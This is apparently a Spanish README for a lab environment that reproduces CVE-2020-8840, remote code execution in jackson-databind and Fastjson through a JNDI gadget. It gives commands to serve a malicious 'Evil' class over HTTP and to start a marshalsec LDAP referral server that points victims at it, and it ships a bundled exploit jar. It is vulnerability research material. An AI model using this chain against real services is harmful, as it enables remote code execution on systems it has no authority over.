
Código de entorno de reproducción y análisis de la vulnerabilidad de ejecución remota de código en Jackson-databind (CVE-2020-8840)
Código del entorno de reproducción y análisis de la vulnerabilidad de ejecución remota de código en Jackson-databind (CVE-2020-8840).
El proyecto incluye:
jackson-databind, Fastjson payloadsmarshalsec-0.0.3-SNAPSHOT-all.jar compiladoVulnerabilidad de ejecución remota de código en Jackson-databind (CVE-2020-8840). Un atacante puede aprovechar la cadena de explotación de xbean-reflect (org.apache.xbean.propertyeditor.JndiConverter) para desencadenar la carga remota de clases JNDI y así lograr la ejecución remota de código.
Esta vulnerabilidad afecta a ciertas versiones de jackson-databind y Fastjson.
Versiones afectadas: 2.0.0 <= FasterXML jackson-databind <= 2.9.10.2

El servicio LDAP al que apunta el código de ejemplo debe configurarse por su cuenta.
WebServer
Inicie un servicio HTTP para alojar la clase maliciosa (en el proyecto se incluye la clase Evil.java).
python -m http.server 2222

Servicio LDAP
Descargue la herramienta Marshalsec, compílela como jar, inicie el servicio LDAP y establezca la dirección codebase (el WebServer que aloja la clase maliciosa).
Para mayor comodidad, se omite la descarga y compilación; en el proyecto también se incluye marshalsec-0.0.3-SNAPSHOT-all.jar (el código del proyecto no es extenso, esta es la razón principal del gran tamaño), compilado con JDK8.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:2222/#Evil

Versiones afectadas: Fastjson <= 1.2.62
El entorno de reproducción es el mismo que el anterior; configure e inicie el WebServer y el servicio LDAP por su cuenta.
